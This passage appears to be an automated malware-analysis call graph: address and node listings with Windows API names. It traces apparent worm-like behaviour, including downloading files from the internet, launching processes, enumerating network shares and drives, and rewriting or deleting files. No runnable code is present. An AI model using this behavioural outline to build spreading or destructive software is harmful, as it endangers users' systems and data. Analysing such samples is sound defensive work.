12907db CloseHandle 7576->7568 7577 12907f5 SetFilePointer SetEndOfFile 7576->7577 7578 129082b 7577->7578 7579 1290852 7577->7579 7578->7579 7581 1290831 WriteFile 7578->7581 7582 1290869 SetFileTime 7579->7582 7583 1290858 GlobalFree 7579->7583 7580->7576 7584 12907d1 UnmapViewOfFile 7580->7584 7585 1290793 GlobalAlloc 7580->7585 7587 12905ed 7580->7587 7581->7579 7582->7568 7583->7582 7584->7576 7585->7587 7586 129077f 7586->7584 7587->7586 7588->7580 7592 128e9ba 7588->7592 7807 12844cb InterlockedExchange 7588->7807 7590 128e997 7590->7592 7808 12844cb InterlockedExchange 7590->7808 7592->7580 7593 128ed26 lstrcpyn lstrcmpiA 7592->7593 7594 128ed5c 7593->7594 7594->7580 7595 128ee9a GlobalAlloc 7594->7595 7597 128eecf 7594->7597 7596 128eecc 7595->7596 7596->7597 7661 12844cb InterlockedExchange 7597->7661 7599 128f319 7600 128f925 7599->7600 7809 128cd03 7599->7809 7602 128f9a1 7600->7602 7606 128cd03 2 API calls 7600->7606 7603 128f9f8 7602->7603 7607 128cd03 2 API calls 7602->7607 7662 12844cb InterlockedExchange 7603->7662 7604 128f306 IsBadWritePtr 7604->7599 7613 128ef48 7604->7613 7606->7602 7607->7603 7608 128fa0e 7609 128fa55 7608->7609 7861 12844cb InterlockedExchange 7608->7861 7663 12844cb InterlockedExchange 7609->7663 7612 128fa82 7614 128cd03 2 API calls 7612->7614 7615 128fad5 7612->7615 7613->7580 7613->7599 7613->7604 7619 128f39d 7613->7619 7614->7615 7616 128cd03 2 API calls 7615->7616 7617 128fb50 7615->7617 7616->7617 7623 128fb9e 7617->7623 7862 128c76b 7617->7862 7620 128f4ce IsBadWritePtr 7619->7620 7625 128f4e1 7620->7625 7621 128fc7e 7664 12844cb InterlockedExchange 7621->7664 7623->7621 7624 128cd03 2 API calls 7623->7624 7624->7621 7626 128f579 IsBadWritePtr 7625->7626 7632 128f58c 7626->7632 7627 128fc94 7628 128fd1f 7627->7628 7629 128fd5c 7627->7629 7633 128cd03 2 API calls 7627->7633 7876 128b3ef 7628->7876 7629->7580 7665 128d34d 7629->7665 7634 128f5e4 IsBadWritePtr 7632->7634 7633->7628 7634->7599 7636 128f5fc IsBadWritePtr 
7634->7636 7636->7599 7647 128f614 7636->7647 7637 128f634 IsBadWritePtr 7637->7599 7639 128f64c IsBadWritePtr 7637->7639 7638 128c89a 2 API calls 7649 128fe88 7638->7649 7639->7599 7639->7647 7640 128f705 IsBadWritePtr 7640->7599 7640->7647 7641 128f742 IsBadWritePtr 7641->7599 7641->7647 7642 128f76e lstrcmpiA 7643 128f7cd lstrcmpiA 7642->7643 7642->7647 7644 128f802 lstrcmpiA 7643->7644 7643->7647 7645 128f834 lstrcmpiA 7644->7645 7644->7647 7646 128f875 lstrcmpiA 7645->7646 7645->7647 7646->7647 7647->7599 7647->7637 7647->7640 7647->7641 7647->7642 7647->7643 7647->7644 7647->7645 7647->7646 7649->7580 7902 1286981 7649->7902 7650 12903c7 7651 12904a3 7650->7651 7913 12844cb InterlockedExchange 7651->7913 7653 12904ed GetTickCount 7654 12905c8 7653->7654 7655 129051a 7653->7655 7654->7580 7914 12844cb InterlockedExchange 7655->7914 7657 129051f 7657->7654 7915 12844cb InterlockedExchange 7657->7915 7659->7552 7660->7560 7661->7613 7662->7608 7663->7612 7664->7627 7666 128d3b6 7665->7666 7670 128d3e7 7666->7670 7949 12844cb InterlockedExchange 7666->7949 7668 128d45c 7916 12844cb InterlockedExchange 7668->7916 7670->7668 7672 128cd03 2 API calls 7670->7672 7671 128d47b 7673 128d4aa 7671->7673 7950 12844cb InterlockedExchange 7671->7950 7672->7670 7675 128c76b 2 API calls 7673->7675 7676 128d4e3 7675->7676 7677 128c76b 2 API calls 7676->7677 7678 128d50b 7677->7678 7917 12844cb InterlockedExchange 7678->7917 7680 128d535 7681 128d564 7680->7681 7951 12844cb InterlockedExchange 7680->7951 7683 128c76b 2 API calls 7681->7683 7684 128d58b 7683->7684 7685 128c76b 2 API calls 7684->7685 7686 128d5c8 7685->7686 7687 128b3ef InterlockedExchange 7686->7687 7688 128d603 7687->7688 7918 12844cb InterlockedExchange 7688->7918 7690 128d613 7919 128b354 7690->7919 7694 128d659 7695 128d688 7694->7695 7952 12844cb InterlockedExchange 7694->7952 7697 128c76b 2 API calls 7695->7697 7698 128d6b9 7697->7698 7929 12844cb InterlockedExchange 7698->7929 7700 128d6cf 7701 128d706 
7700->7701 7953 12844cb InterlockedExchange 7700->7953 7703 128c76b 2 API calls 7701->7703 7704 128d749 7703->7704 7705 128b3ef InterlockedExchange 7704->7705 7706 128d7b6 7705->7706 7930 128d1b9 7706->7930 7708 128d7dc 7709 128b3ef InterlockedExchange 7708->7709 7710 128d7fc 7709->7710 7711 128c76b 2 API calls 7710->7711 7712 128d824 7711->7712 7713 128b3ef InterlockedExchange 7712->7713 7714 128d87f 7713->7714 7943 12844cb InterlockedExchange 7714->7943 7716 128d8a9 7718 128d8e8 7716->7718 7954 12844cb InterlockedExchange 7716->7954 7719 128c76b 2 API calls 7718->7719 7720 128d925 7719->7720 7944 12844cb InterlockedExchange 7720->7944 7722 128d935 7724 128d974 7722->7724 7955 12844cb InterlockedExchange 7722->7955 7725 128c76b 2 API calls 7724->7725 7726 128d9b7 7725->7726 7727 128b3ef InterlockedExchange 7726->7727 7728 128d9d7 7727->7728 7729 128b3ef InterlockedExchange 7728->7729 7730 128da11 7729->7730 7731 128d1b9 2 API calls 7730->7731 7732 128da37 7731->7732 7733 128b3ef InterlockedExchange 7732->7733 7734 128da57 7733->7734 7735 128d1b9 2 API calls 7734->7735 7736 128da7d 7735->7736 7737 128b3ef InterlockedExchange 7736->7737 7738 128dac3 7737->7738 7739 128c76b 2 API calls 7738->7739 7740 128daeb 7739->7740 7945 12844cb InterlockedExchange 7740->7945 7742 128dafb 7744 128db3a 7742->7744 7956 12844cb InterlockedExchange 7742->7956 7745 128c76b 2 API calls 7744->7745 7746 128db92 7745->7746 7747 128c76b 2 API calls 7746->7747 7748 128dc05 7747->7748 7749 128c76b 2 API calls 7748->7749 7750 128dc2d 7749->7750 7946 12844cb InterlockedExchange 7750->7946 7752 128dc3d 7754 128dc7c 7752->7754 7957 12844cb InterlockedExchange 7752->7957 7755 128c76b 2 API calls 7754->7755 7756 128dcc9 7755->7756 7757 128b3ef InterlockedExchange 7756->7757 7758 128dd36 7757->7758 7759 128d1b9 2 API calls 7758->7759 7760 128dd5c 7759->7760 7761 128b3ef InterlockedExchange 7760->7761 7762 128dd7c 7761->7762 7763 128b3ef InterlockedExchange 7762->7763 7764 128ddd2 7763->7764 7765 
128b3ef InterlockedExchange 7764->7765 7766 128de2d 7765->7766 7767 128c76b 2 API calls 7766->7767 7768 128de8b 7767->7768 7769 128c76b 2 API calls 7768->7769 7770 128deb3 7769->7770 7947 12844cb InterlockedExchange 7770->7947 7772 128dec3 7774 128df0a 7772->7774 7958 12844cb InterlockedExchange 7772->7958 7775 128c76b 2 API calls 7774->7775 7776 128df61 7775->7776 7777 128b3ef InterlockedExchange 7776->7777 7778 128df81 7777->7778 7779 128b3ef InterlockedExchange 7778->7779 7780 128dfee 7779->7780 7781 128d1b9 2 API calls 7780->7781 7782 128e014 7781->7782 7783 128b3ef InterlockedExchange 7782->7783 7784 128e034 7783->7784 7785 128c76b 2 API calls 7784->7785 7786 128e05a 7785->7786 7787 128c76b 2 API calls 7786->7787 7788 128e082 7787->7788 7948 12844cb InterlockedExchange 7788->7948 7791 128e0cd 7792 128e114 7791->7792 7959 12844cb InterlockedExchange 7791->7959 7793 128c76b 2 API calls 7792->7793 7794 128e16b 7793->7794 7795 128c76b 2 API calls 7794->7795 7796 128e193 7795->7796 7797 128c76b 2 API calls 7796->7797 7798 128e1bb 7797->7798 7799 128c76b 2 API calls 7798->7799 7800 128e1e1 7799->7800 7801 128c76b 2 API calls 7800->7801 7802 128e20a 7801->7802 7803 128c76b 2 API calls 7802->7803 7804 128e28f 7803->7804 7805 128c76b 2 API calls 7804->7805 7806 128e2c4 7805->7806 7806->7580 7806->7638 7807->7590 7808->7592 7810 128cd58 7809->7810 7811 128cd47 7809->7811 7977 12844cb InterlockedExchange 7810->7977 7965 128cb12 7811->7965 7814 128cd68 7815 128ce2c 7814->7815 7978 128cc78 7814->7978 7817 128ce62 7815->7817 7819 128cb12 InterlockedExchange 7815->7819 7988 12844cb InterlockedExchange 7817->7988 7819->7817 7822 128d1a7 7822->7600 7823 128cdac 7825 128cdd9 7823->7825 7826 128cdc2 7823->7826 7824 128cb12 InterlockedExchange 7824->7822 7986 12844cb InterlockedExchange 7825->7986 7985 12844cb InterlockedExchange 7826->7985 7827 128ce72 7830 128cc78 InterlockedExchange 7827->7830 7860 128d060 7827->7860 7832 128cea5 7830->7832 7831 128cdc7 7987 12844cb 
InterlockedExchange 7831->7987 7832->7860 7989 12844cb InterlockedExchange 7832->7989 7835 128ceca 7990 12844cb InterlockedExchange 7835->7990 7836 128ce09 7837 128c76b 2 API calls 7836->7837 7837->7815 7839 128ceea 7840 128cf2b 7839->7840 7841 128cf04 7839->7841 7843 128c76b 2 API calls 7840->7843 7842 128b354 2 API calls 7841->7842 7844 128cf1a 7842->7844 7843->7844 7991 12844cb InterlockedExchange 7844->7991 7846 128cf66 7847 128c76b 2 API calls 7846->7847 7848 128cf78 7846->7848 7847->7848 7849 128cfe8 7848->7849 7850 128cfff 7848->7850 7992 12844cb InterlockedExchange 7849->7992 7993 12844cb InterlockedExchange 7850->7993 7853 128cfed 7854 128c76b 2 API calls 7853->7854 7855 128d037 7854->7855 7856 128d050 7855->7856 7857 128d0f1 7855->7857 7856->7860 7994 12844cb InterlockedExchange 7856->7994 7857->7860 7995 12844cb InterlockedExchange 7857->7995 7860->7822 7860->7824 7861->7608 7863 128b3ef InterlockedExchange 7862->7863 7864 128c78a 7863->7864 7865 128c7cb 7864->7865 7866 128c79b 7864->7866 7868 128c7fe 7865->7868 7869 128c7d1 7865->7869 8007 128b614 7866->8007 7872 128c82f 7868->7872 7873 128c804 7868->7873 8057 128bfb2 7869->8057 7870 128c7bb 7870->7623 7872->7870 8097 128c61c 7872->8097 8086 128c459 7873->8086 7877 128b425 7876->7877 7890 128b41e 7876->7890 8121 12844cb InterlockedExchange 7877->8121 7879 128b431 7893 128b45e 7879->7893 8122 12844cb InterlockedExchange 7879->8122 7882 128b574 7886 128b59e 7882->7886 7882->7890 8131 12844cb InterlockedExchange 7882->8131 7883 128b44c 7883->7893 8123 12844cb InterlockedExchange 7883->8123 7885 128b47a 7900 128b4f4 7885->7900 8124 12844cb InterlockedExchange 7885->8124 8132 12844cb InterlockedExchange 7886->8132 7890->7629 7892 128b495 8125 12844cb InterlockedExchange 7892->8125 8130 12844cb InterlockedExchange 7893->8130 7895 128b4aa 8126 12844cb InterlockedExchange 7895->8126 7897 128b4bf 7898 128b4ee 7897->7898 8127 12844cb InterlockedExchange 7897->8127 7898->7900 8128 12844cb InterlockedExchange 
7898->8128 8129 12844cb InterlockedExchange 7900->8129 8133 12844cb InterlockedExchange 7902->8133 7904 1286990 7905 12869e9 7904->7905 7906 1286cdf 7904->7906 7907 1286d75 7904->7907 7905->7650 7908 1286d3b 7906->7908 7909 1286cec 7906->7909 7907->7905 8134 12860d9 7907->8134 7910 1284503 InterlockedExchange 7908->7910 7911 1284503 InterlockedExchange 7909->7911 7910->7905 7911->7905 7913->7653 7914->7657 7915->7657 7916->7671 7917->7680 7918->7690 7960 12844cb InterlockedExchange 7919->7960 7921 128b366 7961 12844cb InterlockedExchange 7921->7961 7923 128b37b 7924 128b39c 7923->7924 7925 128b38d GetTickCount 7923->7925 7926 128c76b InterlockedExchange 7924->7926 7925->7924 7927 128b3b7 7926->7927 7928 12844cb InterlockedExchange 7927->7928 7928->7694 7929->7700 7931 128d1f4 7930->7931 7932 128d346 7931->7932 7933 128d20e 7931->7933 7962 12844cb InterlockedExchange 7931->7962 7932->7708 7963 12844cb InterlockedExchange 7933->7963 7936 128d273 7938 128c76b 2 API calls 7936->7938 7939 128d298 7936->7939 7937 128d232 7937->7936 7964 12844cb InterlockedExchange 7937->7964 7938->7939 7941 128b3ef InterlockedExchange 7939->7941 7942 128d336 7941->7942 7942->7708 7943->7716 7944->7722 7945->7742 7946->7752 7947->7772 7948->7791 7949->7666 7950->7671 7951->7680 7952->7694 7953->7700 7954->7716 7955->7722 7956->7742 7957->7752 7958->7772 7959->7791 7960->7921 7961->7923 7962->7933 7963->7937 7964->7936 7966 128b3ef InterlockedExchange 7965->7966 7967 128cb4b 7966->7967 7996 12844cb InterlockedExchange 7967->7996 7969 128cb5f 7970 128cc4b 7969->7970 7997 12844cb InterlockedExchange 7969->7997 7972 128b3ef InterlockedExchange 7970->7972 7973 128cc62 7972->7973 7973->7810 7974 12844cb InterlockedExchange 7976 128cb7a 7974->7976 7976->7970 7976->7974 7998 1284503 7976->7998 7977->7814 7979 128cc92 7978->7979 7982 128ccf8 7978->7982 7979->7982 8005 12844cb InterlockedExchange 7979->8005 7981 128ccc0 7981->7982 8006 12844cb InterlockedExchange 7981->8006 7982->7815 7984 12844cb 
InterlockedExchange 7982->7984 7984->7823 7985->7831 7986->7831 7987->7836 7988->7827 7989->7835 7990->7839 7991->7846 7992->7853 7993->7853 7994->7860 7995->7860 7996->7969 7997->7976 8003 12844cb InterlockedExchange 7998->8003 8000 128450c 8004 12844cb InterlockedExchange 8000->8004 8002 128451a 8002->7976 8003->8000 8004->8002 8005->7981 8006->7981 8008 128b64a 8007->8008 8009 128b3ef InterlockedExchange 8008->8009 8010 128b67b 8009->8010 8102 12844cb InterlockedExchange 8010->8102 8013 128b913 8055 128ba0a 8013->8055 8104 12844cb InterlockedExchange 8013->8104 8014 128b3ef InterlockedExchange 8015 128ba31 8014->8015 8017 128be04 8015->8017 8018 128ba46 8015->8018 8016 128b68b 8020 12844cb InterlockedExchange 8016->8020 8045 128b75e 8016->8045 8048 1284503 InterlockedExchange 8016->8048 8053 128badc 8017->8053 8112 12844cb InterlockedExchange 8017->8112 8106 12844cb InterlockedExchange 8018->8106 8020->8016 8021 128ba4b 8022 128bd22 8021->8022 8023 128ba75 8021->8023 8024 128bb06 8021->8024 8041 128bcb3 8021->8041 8021->8053 8025 128bd28 8022->8025 8026 128bd5f 8022->8026 8038 128b3ef InterlockedExchange 8023->8038 8027 128b354 2 API calls 8024->8027 8030 128bfb2 2 API calls 8025->8030 8031 128bd68 8026->8031 8032 128bd7f 8026->8032 8033 128bb1a 8027->8033 8028 128bf63 8028->7870 8030->8053 8110 12844cb InterlockedExchange 8031->8110 8111 12844cb InterlockedExchange 8032->8111 8039 128b3ef InterlockedExchange 8033->8039 8034 128b3ef InterlockedExchange 8034->8028 8038->8053 8043 128bb3a 8039->8043 8040 128b995 8051 128b9d5 8040->8051 8105 12844cb InterlockedExchange 8040->8105 8041->8053 8109 12844cb InterlockedExchange 8041->8109 8042 128bd6d 8056 128b3ef InterlockedExchange 8042->8056 8046 128bb4b 8043->8046 8047 128bb85 8043->8047 8103 12844cb InterlockedExchange 8045->8103 8107 12844cb InterlockedExchange 8046->8107 8108 12844cb InterlockedExchange 8047->8108 8048->8016 8054 128b614 2 API calls 8051->8054 8053->8028 8053->8034 8054->8055 8055->8014 
8056->8053 8058 128b3ef InterlockedExchange 8057->8058 8059 128bffe 8058->8059 8113 12844cb InterlockedExchange 8059->8113 8061 128b3ef InterlockedExchange 8062 128c136 8061->8062 8066 128c1b8 8062->8066 8116 12844cb InterlockedExchange 8062->8116 8064 128c00e 8085 128c10f 8064->8085 8114 12844cb InterlockedExchange 8064->8114 8065 128c18a 8065->8066 8068 128c2a3 8065->8068 8072 128c1f2 8065->8072 8070 128c40e 8066->8070 8073 128b3ef InterlockedExchange 8066->8073 8069 128b354 2 API calls 8068->8069 8074 128c2b7 8069->8074 8070->7870 8071 128c092 8079 128c0da 8071->8079 8115 12844cb InterlockedExchange 8071->8115 8077 128b3ef InterlockedExchange 8072->8077 8073->8070 8075 128b3ef InterlockedExchange 8074->8075 8078 128c2d7 8075->8078 8077->8066 8080 128c2e8 8078->8080 8081 128c322 8078->8081 8082 128bfb2 2 API calls 8079->8082 8117 12844cb InterlockedExchange 8080->8117 8118 12844cb InterlockedExchange 8081->8118 8082->8085 8085->8061 8087 128b3ef InterlockedExchange 8086->8087 8088 128c490 8087->8088 8096 128c4bc 8088->8096 8119 12844cb InterlockedExchange 8088->8119 8090 128c4aa 8091 128b354 2 API calls 8090->8091 8090->8096 8092 128c4f6 8091->8092 8120 12844cb InterlockedExchange 8092->8120 8093 128c60a 8093->7870 8095 128b3ef InterlockedExchange 8095->8093 8096->8093 8096->8095 8098 128b3ef InterlockedExchange 8097->8098 8099 128c653 8098->8099 8100 128b3ef InterlockedExchange 8099->8100 8101 128c759 8099->8101 8100->8101 8101->7870 8102->8016 8103->8013 8104->8040 8105->8040 8106->8021 8107->8053 8108->8053 8109->8053 8110->8042 8111->8042 8112->8053 8113->8064 8114->8071 8115->8071 8116->8065 8117->8066 8118->8066 8119->8090 8120->8096 8121->7879 8122->7883 8123->7885 8124->7892 8125->7895 8126->7897 8127->7897 8128->7900 8129->7893 8130->7882 8131->7886 8132->7890 8133->7904 8135 1286132 8134->8135 8137 12861f2 8135->8137 8138 12844cb InterlockedExchange 8135->8138 8137->7905 8138->8137 8139->7399 8141 128a7b8 8140->8141 8142 128a7a9 lstrcat 8140->8142 8192 
128a16b 8141->8192 8142->8141 8144 128a7c4 lstrcpy 8197 12844cb InterlockedExchange 8144->8197 8146 128a7da 8147 128a7ec lstrlen wsprintfA 8146->8147 8148 128a814 lstrlen wsprintfA 8146->8148 8149 128a83b 8147->8149 8148->8149 8149->7405 8200 128a677 8150->8200 8152 1290b8f 8152->7405 8154 1290a0a InternetOpenA 8155 1290a31 InternetOpenUrlA 8154->8155 8156 1290b63 8154->8156 8155->8156 8157 1290a63 8155->8157 8158 1290b79 8156->8158 8159 1290b6c InternetCloseHandle 8156->8159 8160 1290a69 CreateFileA 8157->8160 8161 1290a8b InternetReadFile 8157->8161 8158->8152 8162 1290b82 InternetCloseHandle 8158->8162 8159->8158 8160->8161 8166 1290ab3 8161->8166 8162->8152 8163 1290b56 CloseHandle 8163->8156 8164 1290acf WriteFile 8164->8166 8165 1290b15 8165->8163 8166->8161 8166->8163 8166->8164 8166->8165 8168 1291536 GlobalAlloc ReadFile lstrlen 8167->8168 8169 129152f 8167->8169 8170 1291587 8168->8170 8169->7405 8171 129159d lstrlen 8170->8171 8172 1291730 8170->8172 8178 12915c4 8171->8178 8172->8169 8173 1291736 GlobalFree 8172->8173 8173->8169 8174 12915fe lstrlen 8174->8178 8175 1291641 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 8176 12916b8 8175->8176 8177 12916c4 8175->8177 8176->8177 8179 12916e5 8176->8179 8180 12916ca GlobalFree 8177->8180 8181 12916d4 DeleteFileA 8177->8181 8178->8172 8178->8174 8178->8175 8182 1284631 3 API calls 8179->8182 8180->8181 8181->8169 8183 12916ee Sleep CreateThread 8182->8183 8184 12841c6 3 API calls 8183->8184 8212 128a1f2 lstrcpy 8183->8212 8185 1291722 Sleep 8184->8185 8185->8172 8187 128460b WriteFile CloseHandle 8186->8187 8188 128462d 8186->8188 8187->8188 8188->7411 8190 128470c CreateProcessA 8189->8190 8190->7414 8198 12844cb InterlockedExchange 8192->8198 8194 128a1dd lstrcpy 8194->8144 8196 128a192 8196->8194 8199 12844cb InterlockedExchange 8196->8199 8197->8146 8198->8196 8199->8196 8202 128a68a 8200->8202 8201 128a757 8201->8152 8201->8154 8202->8201 8203 128a6b0 8202->8203 8204 128a70f 
GetTickCount 8203->8204 8205 128a6c5 GetTickCount 8203->8205 8211 12844cb InterlockedExchange 8204->8211 8210 12844cb InterlockedExchange 8205->8210 8208 128a6d2 GetTickCount lstrlen wsprintfA 8208->8201 8209 128a71c GetTickCount lstrlen wsprintfA 8209->8201 8210->8208 8211->8209 8213 128a226 8212->8213 8214 128a25d RtlExitUserThread 8213->8214 8215 128a22f GetFileAttributesA 8213->8215 8216 128a241 8215->8216 8217 128a243 DeleteFileA Sleep 8215->8217 8216->8214 8217->8213 8219 1298060 8218->8219 8220 1293787 GlobalAlloc 8219->8220 8221 129381f 8220->8221 8267 1292fff 8221->8267 8223 128e329 48 API calls 8224 129382e 8223->8224 8224->8223 8225 129384d Sleep 8224->8225 8227 129385a 8224->8227 8225->8224 8228 12938a2 8227->8228 8272 12844cb InterlockedExchange 8227->8272 8228->7426 8230 129192e 8229->8230 8235 1291828 8229->8235 8230->7438 8231 1291843 RegEnumValueA 8232 129191a RegCloseKey 8231->8232 8231->8235 8232->8230 8234 12918bd lstrlen lstrlen 8234->8235 8235->8231 8235->8234 8236 128e329 48 API calls 8235->8236 8237 129190a Sleep 8236->8237 8237->8235 8239 1291a42 GlobalAlloc 8238->8239 8240 1291a26 8238->8240 8244 1291a5a 8239->8244 8240->7440 8241 1291c9d GlobalFree WNetCloseEnum 8241->8240 8242 1291a79 WNetEnumResourceA 8243 1291c7e GetLastError 8242->8243 8242->8244 8245 1291c8b 8243->8245 8246 1291c8d Sleep 8243->8246 8244->8241 8244->8242 8244->8246 8247 1291acf 8244->8247 8245->8241 8246->8244 8248 1291c77 8247->8248 8249 1291c51 8247->8249 8250 1291b14 lstrcpy lstrcat 8247->8250 8248->7440 8252 129195d 103 API calls 8249->8252 8251 1290b9a 7 API calls 8250->8251 8254 1291b47 8251->8254 8253 1291c69 Sleep 8252->8253 8253->8248 8254->8249 8255 1291b6b lstrcpy lstrlen 8254->8255 8256 1291bf1 8254->8256 8258 1291ba8 lstrlen 8255->8258 8259 1291b96 lstrcat 8255->8259 8257 1291c38 8256->8257 8263 1291c0f lstrlen 8256->8263 8257->8249 8261 1291c44 DeleteFileA 8257->8261 8260 128a16b 2 API calls 8258->8260 8259->8258 8262 1291bc2 lstrcat 8260->8262 
8261->8249 8273 1290c4b 8262->8273 8279 1291060 Sleep 8263->8279 8268 128a75a 10 API calls 8267->8268 8269 1293015 CreateFileA 8268->8269 8270 129303a WriteFile CloseHandle 8269->8270 8271 129305e 8269->8271 8270->8271 8271->8224 8272->8227 8274 1290c6a lstrlen 8273->8274 8275 1290c61 8274->8275 8276 1290c8d CreateFileA 8274->8276 8275->8274 8278 1290c87 8275->8278 8277 1290caf WriteFile CloseHandle GetFileAttributesA 8276->8277 8276->8278 8277->8278 8278->8256 8280 12910ec 8279->8280 8281 12910d4 lstrcat 8279->8281 8282 1291101 8280->8282 8283 1291117 lstrcat FindFirstFileA 8280->8283 8281->8280 8282->8257 8284 1291170 8283->8284 8285 1291141 FindNextFileA 8283->8285 8287 1291492 8284->8287 8292 129146f 8284->8292 8285->8284 8286 1291157 8285->8286 8286->8284 8286->8285 8290 129117b Sleep 8286->8290 8291 129119f lstrlen 8286->8291 8298 12913aa lstrcpy lstrlen lstrcmpiA 8286->8298 8299 128e329 48 API calls 8286->8299 8300 1291060 71 API calls 8286->8300 8301 1291355 8286->8301 8302 128a26e 48 API calls 8286->8302 8304 12912f2 lstrcpy lstrcat 8286->8304 8288 12914bb Sleep 8287->8288 8289 12914b1 FindClose 8287->8289 8288->8282 8289->8288 8290->8291 8291->8286 8293 12911c7 lstrcat lstrlen lstrlen 8291->8293 8319 1290e71 8292->8319 8293->8286 8295 1291207 lstrcmpiA 8293->8295 8295->8286 8297 129121e lstrcmpiA 8295->8297 8297->8286 8298->8286 8299->8286 8300->8286 8301->8286 8305 129136a DeleteFileA 8301->8305 8306 1290cf6 CreateFileA 8301->8306 8302->8286 8304->8286 8305->8301 8307 1290e6a 8306->8307 8308 1290d45 GetFileSize 8306->8308 8307->8301 8309 1290d61 GlobalAlloc ReadFile 8308->8309 8310 1290e60 CloseHandle 8308->8310 8311 1290da1 8309->8311 8310->8307 8312 1290dac CreateFileW 8311->8312 8313 1290e56 GlobalFree 8311->8313 8312->8313 8314 1290ddb GetFileSize 8312->8314 8313->8310 8315 1290e4c CloseHandle 8314->8315 8316 1290df3 GlobalAlloc ReadFile 8314->8316 8315->8313 8317 1290e34 8316->8317 8318 1290e42 GlobalFree 8317->8318 8318->8315 8320 1298060 
8319->8320 8321 1290e7e lstrcpy 8320->8321 8322 1290f1a lstrlen 8321->8322 8323 1290f03 8321->8323 8325 128a16b 2 API calls 8322->8325 8338 12844cb InterlockedExchange 8323->8338 8327 1290f34 lstrcat 8325->8327 8326 1290f08 8326->8322 8328 1290f4b 8326->8328 8329 1290f76 MultiByteToWideChar CreateFileA 8327->8329 8339 12844cb InterlockedExchange 8328->8339 8330 1290fc1 lstrlenW 8329->8330 8331 1291055 8329->8331 8340 129772b 8330->8340 8331->8287 8334 1290f50 lstrcat 8334->8329 8336 129772b 8337 1291017 WriteFile CloseHandle 8336->8337 8337->8331 8338->8326 8339->8334 8341 1290ff1 lstrlenW 8340->8341 8341->8336 8343 1298060 8342->8343 8344 1291cf0 lstrcpy GetDriveTypeA 8343->8344 8345 1291d7e RtlExitUserThread 8344->8345 8346 1291d60 8344->8346 8347 1291060 91 API calls 8346->8347 8348 1291d7b 8347->8348 8348->8345 8350 1291ea9 8349->8350 8351 1291ee8 RtlExitUserThread 8350->8351 8394 1291d8f RegOpenKeyExA 8350->8394 8353 1291ebe Sleep 8354 1291d8f 53 API calls 8353->8354 8355 1291ed8 Sleep 8354->8355 8355->8350 8357 129308c 8356->8357 8403 12844cb InterlockedExchange 8357->8403 8359 1293162 Sleep 8360 1292fff 13 API calls 8359->8360 8362 1293188 8360->8362 8361 128e329 48 API calls 8361->8362 8362->8361 8363 12931a7 Sleep 8362->8363 8366 12931b4 8362->8366 8363->8362 8364 1293744 RtlExitUserThread 8366->8364 8367 1292ebc 11 API calls 8366->8367 8369 1293734 Sleep 8366->8369 8370 1293278 GetDriveTypeA 8366->8370 8368 129320b Sleep GetLogicalDrives 8367->8368 8368->8366 8369->8366 8370->8366 8371 12932bc lstrcat CreateFileA 8370->8371 8372 12932ff GetFileTime FileTimeToSystemTime 8371->8372 8373 1293522 GetFileAttributesA 8371->8373 8376 1293515 CloseHandle 8372->8376 8390 129333d 8372->8390 8374 1293569 CreateFileA 8373->8374 8375 129353e SetFileAttributesA DeleteFileA 8373->8375 8374->8366 8378 1293598 GetSystemTime SystemTimeToFileTime 8374->8378 8441 128a2ad SHFileOperation RemoveDirectoryA 8375->8441 8376->8373 8380 128a16b 2 API calls 8378->8380 8379 1293566 
8379->8374 8386 1293605 8380->8386 8381 1293372 ReadFile CharLowerA lstrlen 8383 1293509 8381->8383 8381->8390 8383->8376 8384 129361f lstrcat 8384->8386 8385 1293633 lstrcat 8385->8386 8386->8384 8386->8385 8404 12844cb InterlockedExchange 8386->8404 8405 1292b8e 8386->8405 8388 1293658 6 API calls 8388->8366 8389 12936ef WriteFile CloseHandle SetFileAttributesA 8388->8389 8389->8366 8390->8376 8390->8381 8390->8383 8391 1293465 lstrcpy GetFileAttributesA 8390->8391 8391->8383 8392 1293491 CloseHandle CreateFileA 8391->8392 8392->8383 8393 12934c9 WriteFile CloseHandle SetFileAttributesA 8392->8393 8393->8383 8395 1291e89 RegCloseKey 8394->8395 8396 1291de5 RegEnumValueA 8394->8396 8395->8353 8397 1291e29 8396->8397 8398 1291e34 8396->8398 8397->8398 8399 1291e36 GetFileAttributesA 8397->8399 8398->8395 8400 1291e48 8399->8400 8401 1291e5f Sleep 8400->8401 8402 128e329 48 API calls 8400->8402 8401->8395 8401->8396 8402->8400 8403->8359 8404->8386 8406 1292c23 8405->8406 8442 12844cb InterlockedExchange 8406->8442 8408 1292c2b 8409 1292c49 lstrcat 8408->8409 8443 1292a35 lstrlen 8408->8443 8464 12844cb InterlockedExchange 8409->8464 8412 1292c46 8412->8409 8413 1292c5e 8414 1292c79 8413->8414 8415 1292a35 10 API calls 8413->8415 8416 1292e04 8414->8416 8417 1292ca4 8414->8417 8415->8414 8473 12844cb InterlockedExchange 8416->8473 8465 12844cb InterlockedExchange 8417->8465 8420 1292e09 8421 1292e24 8420->8421 8422 1292a35 10 API calls 8420->8422 8421->8388 8422->8421 8423 1292dff 8423->8388 8424 1292ca9 8424->8423 8466 12844cb InterlockedExchange 8424->8466 8426 1292cf4 8427 1292d12 lstrcpy 8426->8427 8429 1292a35 10 API calls 8426->8429 8467 1292962 8427->8467 8430 1292d0f 8429->8430 8430->8427 8431 1292d44 8432 1292dee lstrcat 8431->8432 8471 12844cb InterlockedExchange 8431->8471 8432->8423 8434 1292d68 8435 1292d7a lstrcat 8434->8435 8436 1292d8c lstrcat 8434->8436 8435->8436 8472 12844cb InterlockedExchange 8436->8472 8438 1292da3 8439 1292db5 lstrcat 
8438->8439 8440 1292dc7 lstrlen wsprintfA 8438->8440 8439->8440 8440->8432 8441->8379 8442->8408 8474 12844cb InterlockedExchange 8443->8474 8445 1292a61 8446 1292a73 lstrcat 8445->8446 8447 1292a82 8445->8447 8446->8447 8475 12844cb InterlockedExchange 8447->8475 8449 1292a87 8450 1292a99 lstrcat 8449->8450 8451 1292aa8 lstrcat 8449->8451 8450->8451 8476 12844cb InterlockedExchange 8451->8476 8453 1292abc 8477 12844cb InterlockedExchange 8453->8477 8455 1292b6e 8456 1292962 InterlockedExchange 8455->8456 8457 1292b77 lstrcat 8456->8457 8457->8412 8458 1292b08 lstrlen 8459 128a16b 2 API calls 8458->8459 8462 1292aca 8459->8462 8460 12844cb InterlockedExchange 8460->8462 8461 1292b37 lstrcat 8461->8462 8462->8455 8462->8458 8462->8460 8462->8461 8463 1292b5d lstrcat 8462->8463 8463->8462 8464->8413 8465->8424 8466->8426 8469 1292976 8467->8469 8468 1292a31 8468->8431 8469->8468 8470 